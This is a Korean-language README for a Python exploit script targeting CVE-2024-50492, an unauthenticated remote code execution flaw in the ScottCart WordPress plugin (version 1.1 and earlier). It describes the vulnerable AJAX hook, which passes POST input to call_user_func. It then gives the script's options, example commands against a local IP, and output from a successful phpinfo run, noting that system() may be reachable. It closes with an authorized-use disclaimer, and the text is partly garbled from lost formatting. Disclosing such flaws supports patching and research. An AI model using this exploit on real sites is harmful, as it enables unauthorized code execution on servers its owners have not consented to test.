
ScottCart <= 1.1 - 인증되지 않은 원격 코드 실행
🔥 ScottCart <= 1.1 용 익스플로잇 스크립트 - 인증되지 않은 원격 코드 실행
🧑💻 작성자: Nxploit – Khaled Alenazi
WordPress 용 ScottCart 플러그인 (버전 ≤ 1.1)은 원격 코드 실행(RCE) 에 취약합니다.
이로 인해 인증되지 않은 공격자가 취약한 AJAX 엔드포인트를 통해 서버에서 임의의 PHP 함수를 실행할 수 있습니다.
플러그인은 보호되지 않은 AJAX 액션을 등록합니다:
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
다음을 실행합니다:
call_user_func($_POST['function']);
공격자가 기존의 모든 PHP 함수를 호출할 수 있게 합니다. 예:
phpinfo()scottcart_get_the_user_ip()system() ← 수정된 환경에서 확장된 경우phpinfo()results_2025-03-26_14-33-01.txt)User-Agent, 오류 처리, SSL 무시usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.
options:
-h, --help Show this help message and exit
-u URL, --url URL Target base URL (e.g., http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Function to call (default: phpinfo)
phpinfo()를 사용한 PoC):python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:
PHP Version => 8.1.12
...
📁 그리고 저장됨: results_2025-03-26_14-33-01.txt
이 도구는 교육 및 승인된 테스트 목적으로만 사용됩니다.
소유하지 않았거나 테스트 권한이 명시적으로 부여되지 않은 시스템에 대해 사용하지 마십시오.